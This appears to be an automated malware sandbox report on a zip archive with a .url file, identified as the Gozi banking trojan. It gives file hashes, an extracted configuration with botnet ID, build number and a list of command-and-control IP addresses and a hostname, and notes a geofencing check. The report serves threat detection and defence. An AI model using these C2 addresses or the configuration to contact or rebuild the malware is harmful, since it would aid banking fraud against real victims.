General

  • Target

    Agenzia27.zip

  • Size

    479B

  • Sample

    230322-qb5qksgh74

  • MD5

    ecd46cdc9dbe7430391afb524d2ee2ef

  • SHA1

    35ae9dca0c22afeb19b541145e61297f6dc260bb

  • SHA256

    977bb6a4ed4d96674a9194be41d969b178b639c3c04266a0f0e99315d9b84fe9

  • SHA512

    01e9e508f1152a6c0557fecd39ab64dd78314ee11a35c4bc420c5aa5a34fbee08f19be4928fc0fabcf061a263226a8f0efd6c8c2275dfcbad13b417684ae2505

Malware Config

Extracted

Family

gozi

Botnet

7715

C2

checklist.skype.com

62.173.142.50

31.41.44.87

109.248.11.217

212.109.218.151

5.44.45.83

62.173.142.81

193.233.175.113

109.248.11.184

212.109.218.26

185.68.93.7

Attributes
  • base_path

    /drew/

  • build

    250255

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Targets

    • Target

      Agenzia/Agenzia.url

    • Size

      194B

    • MD5

      2e3efd45e12ebbb0307c66f9846db315

    • SHA1

      ca9308c31a6bf36a784f6cf52396c7c66ae4a2db

    • SHA256

      ef74e678ded46b0d5f69622154c95e5ea9f053cc9d0d47e10ca7b19a2b3e5981

    • SHA512

      24b8355fd77b7894184b34319f2a735c76cd8dd1a12525777b179e92b74e2cb46ea733d39ce2cca068fd1f95834ceab951c8b2d2ee0c6e1c17e80610c6842f0d

    • Gozi

      Gozi is a well-known and widely distributed banking trojan.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

MITRE ATT&CK Enterprise v6

Tasks